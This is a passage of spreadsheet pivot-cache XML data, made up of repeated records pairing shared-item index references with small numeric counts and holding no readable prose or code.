    <n v="10"/>
    <x v="449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="20"/>
    <x v="449"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="339"/>
    <x v="449"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="482"/>
    <x v="449"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1017"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1468"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="22"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1469"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1470"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="88"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="88"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="88"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="37"/>
    <x v="88"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="34"/>
    <x v="88"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1471"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="35"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="40"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="250"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1472"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1473"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="28"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1474"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="12"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1475"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="4"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="6"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1477"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="3"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1479"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="5"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="20"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1480"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="9"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="40"/>
    <x v="1476"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1481"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="16"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1482"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1483"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="1"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="1"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="47"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="9"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1484"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="12"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1485"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1486"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1487"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
